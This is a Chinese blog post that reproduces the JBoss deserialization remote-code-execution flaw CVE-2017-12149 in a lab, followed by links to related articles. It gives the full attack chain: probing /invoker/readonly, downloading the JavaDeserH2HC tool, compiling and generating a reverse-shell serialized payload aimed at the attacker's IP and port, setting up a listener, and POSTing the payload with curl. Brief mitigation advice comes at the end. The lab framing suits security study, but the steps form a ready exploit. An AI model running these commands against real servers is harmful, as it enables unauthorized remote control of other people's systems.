JBoss-反序列化命令执行漏洞(CVE-2017-12149)

最新推荐文章于 2024-06-26 08:00:00 发布
最新推荐文章于 2024-06-26 08:00:00 发布
阅读量3.9k 收藏 2
点赞数 3
分类专栏: 中间件漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nzjdsds/article/details/97765205
版权

复现环境

win10

kali

JavaDeserH2HC

jboss-6.0.0

影响范围

JBoss 5.0.0~5.2.2

复现过程

进入JBoss的bin目录

 

run.bat -b 0.0.0.0

访问下http://192.168.61.1:8080/

访问下http://192.168.61.1:8080/invoker/readonly

看到返回500,一般就是漏洞存在

下载利用工具:http://scan.javasec.cn/java/JavaDeserH2HC.zip

把工具放入kali中,并解压

进行文件编译

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

目录里面就会多一个

然后在输入(ip和port更改为自己的)

java -cp .:commons-collections-3.2.1.jar  ReverseShellCommonsCollectionsHashMap ip:port //反弹shell的IP和端口

然后让kali进行监听

我们在向受害主机提交我们的ser文件

curl http://192.168.61.1:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

 

防御方法

建议用户升级到JBOSS AS7。另,不能及时升级的用户,可采取如下临时解决方案:

 1. 不需要 http-invoker.sar 组件的用户可直接删除此组件。

 2. 添加如下代码至 http-invoker.sar 下 web.xml 的 security-constraint 标签中:<url-pattern>/*</url-pattern> 用于对 http invoker 组件进行访问控制。

大方子
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149复现
薛定谔嘚喵博客
05-11 561
漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞
【vulhub】JBOSS 5.x/6.x 反序列化远程代码执行漏洞CVE-2017-12149复现
qq_45300786的博客
04-14 1117
一、漏洞说明 JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器,攻击者利用该漏洞无需用户验证在系统上执行任意命令,获得服务器的控制权。该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。 二、影响的版本 5.x和6.x版本的JBOSSAS 三、搭建环境 docker-compose
关于JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149)的复现
mw_myever的博客
10-06 691
一、漏洞介绍 该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞,该漏洞在内网中比较常见。 二、环境搭建 攻击机:192.168.70.2(kali) 受害机:192.168.70.3(vulhub) 利用命令:docker-compose up -d 启动环境 三、访问目标 1、探测 在kali上利用命令
Jboss多个远程命令执行漏洞CVE-2017-12149CVE-2015-7501、CVE-2017-7504)
最新发布
qq_68163788的博客
06-26 1100
JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss广为流行。
CVE-2017-12149漏洞复现--003
growler67
08-29 1141
0x01-漏洞简介 这两天闲着没事,在研究中间件漏洞,今天我们就来复现一下CVE-2017-12149,此漏洞是jboos中间件的一个反序列化漏洞JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。在/invoker/readonly路径下,攻击者可以构造序列化代码传入服务器进行反序列化,由于没有对反序列化操作进行任何检测,导致攻击者可以执行任意代码。 0x02- 影响版本 JBoss 5.x / 6.x 0x03-环境搭建 1)下载 本次漏洞复现在win7上搭建
JBoss5.x6.x反序列化漏洞CVE-2017-12149复现学习
hklearner的博客
03-29 2159
JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149复现学习 该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞漏洞概要 漏洞名称 JBOSSAS5.x/6.x反序列化命令执行漏洞 威胁类型 远程命令执行 威胁等级 高 漏洞ID CVE-2017-12149 受影响系统及应
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149
07-23
2017年,它被发现存在一个严重的安全漏洞,被称为CVE-2017-12149,这是一个反序列化漏洞,允许远程攻击者通过精心构造的输入来执行任意系统命令,从而对受影响的系统造成严重威胁。 反序列化是将已序列化的对象...
CVE-2017-12149JBOSSas6.X反序列化(反弹shell版)
08-08
CVE-2017-12149是一个针对JBOSS Application Server 6.x版本的严重安全漏洞,它涉及到了Java对象的反序列化过程。在Java中,反序列化是将之前序列化的对象状态恢复到可操作的Java对象的过程。然而,如果这个过程没有...
JBossMQJMS 反序列化漏洞CVE-2017-7504)漏洞利用工具
07-23
漏洞源于应用程序未能正确处理反序列化的对象,使得攻击者可以通过精心构造的恶意输入触发任意代码执行。了解这个漏洞对于网络安全专业人员至关重要,因为这涉及到Web安全和渗透测试领域。 首先,我们需要理解JMS...
jboss-CVE-2017-12149
01-22
Jboss反序列化漏洞利用工具,CVE-2017-12149Jboss反序列化漏洞利用工具,CVE-2017-12149
CVE-2017-12149漏洞复现
2301_80115097的博客
10-31 296
中间件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,Weblogic,JBoos,WebSphere, Jenkins ,GlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp, Spring,Flask,jQuery等。其他漏洞编号利用方式类似,直接放入到工具当中进行检测,存在就存在,可直接执行命令或其上传,注入等操作。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。
CVE-2017-12149JBOSS反序列化远程代码执行漏洞漏洞复现
Jerry____的博客
12-12 3962
一:漏洞说明 JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器,攻击者利用该漏洞无需用户验证在系统上执行任意命令,获得服务器的控制权。 二、影响的版本 5.x和6.x版本的JBOSSAS 三、环境搭建(目标机:192.168.33.144) 利用vulhub搭建环境 1、进入漏洞目录 cd /vulhub/jboss/CVE-2017-12149 2、搭...
Jboss CVE-2017-12149 漏洞复现(vulhub)
MDSEC的博客
08-24 282
CVE-2017-7504 漏洞CVE-2015-7501 的漏洞原理相似,只是利用的路径稍微出现了变化, CVE-2017-7504 出现在 /jbossmq-httpil/HTTPServerILServlet 路径下。JBoss AS 4.x 及之前版本中, JbossMQ 实现过程的 JMS over HTTP Invocation Layer 的HTTPServerILServlet.java 文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。
JBoss 5.x/6.x 反序列化漏洞复现(CVE-2017-12149)
wutiangui的博客
09-11 375
① ysoserial是一款目前最流行的Java反序列化Payload生成工具,目前支持29种的Payload生成。所以我们使用 ysoserial 来复现生成序列化数据,并重定向到exp.ser文件。该漏洞存在于http invoker组件的ReadOnlyAccessFilter的doFilter中,在/invoker/readonly请求中,服务器将用户提交的POST内容进行了Java反序列化执行完该命令之后,会在本地桌面生成一个序列化的文件exp.ser,并利用cat查看其内容。
漏洞复现JBoss反序列化漏洞(CVE-2017-12149)
cj_Hydra's Blog
05-18 2321
前言: JBoss 反序列化漏洞,该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致恶意访问者通过精心设计的序列化数据执行任意代码。但近期有安全研究者发现JBossAS 6.x也受该漏洞影响,恶意访问者利用该漏洞无需用户验证即可获得服务器的控制权。该漏洞的细节和验证代码已公开,为避免造成损失,建议及时修复升级至JBossAS 7版本 影响版本:
CVE-2017-12149 复现及修复
weixin_46580614的博客
07-24 5695
CVE-2017-12149 复现及修复 漏洞名称:JBOOS AS 6.X 反序列化漏洞 CVE编号:CVE-2017-12149 漏洞等级:高危 影响版本:5.x和6.x版本 漏洞描述及原理:2017年8月30日,厂商Redhat发布了一个JBOSSAS 5.x 的反序列化远程代码执行漏洞通告。该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致
漏洞复现Jboss反序列化漏洞CVE-2017-12149
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-17 829
JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用CVE-2017-12149漏洞:该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter ,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。............
复现nuclei——CVE-2017-12149JBOSS反序列化远程代码执行漏洞
记录并分享学习安全的知识点..
01-26 1225
一、漏洞介绍 JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。在/invoker/readonly路径下,攻击者可以构造序列化代码传入服务器进行反序列化,由于没有对反序列化操作进行任何检测,导致攻击者可以执行任意代码。 影响版本:JBoss 5.x / 6.x 访问:​http://x.x.x.x/invoker/readonly​ 可以看到是返回 500,一般漏洞就是存在了。 二、nuclei扫描结果 三、漏洞复现 (一)通过JavaD.
CVE-2017-12149漏洞分析
05-30
CVE-2017-12149JBOSS应用服务器中的一个远程代码执行漏洞JBOSS是一款Java EE应用服务器,该漏洞允许攻击者通过HTTP请求发送恶意的序列化对象,从而在目标服务器上执行任意代码。 这个漏洞的原因在于JBOSS中的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值